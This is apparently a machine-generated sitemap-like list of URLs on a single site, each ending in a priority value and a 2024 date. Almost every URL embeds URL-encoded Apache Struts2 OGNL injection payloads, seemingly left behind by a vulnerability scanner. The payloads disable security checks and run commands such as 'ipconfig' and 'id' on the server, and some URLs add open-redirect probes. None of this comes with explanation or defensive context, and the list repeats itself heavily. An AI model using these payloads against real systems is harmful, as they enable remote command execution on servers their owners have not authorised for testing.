http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fmethod%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=e8ift%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 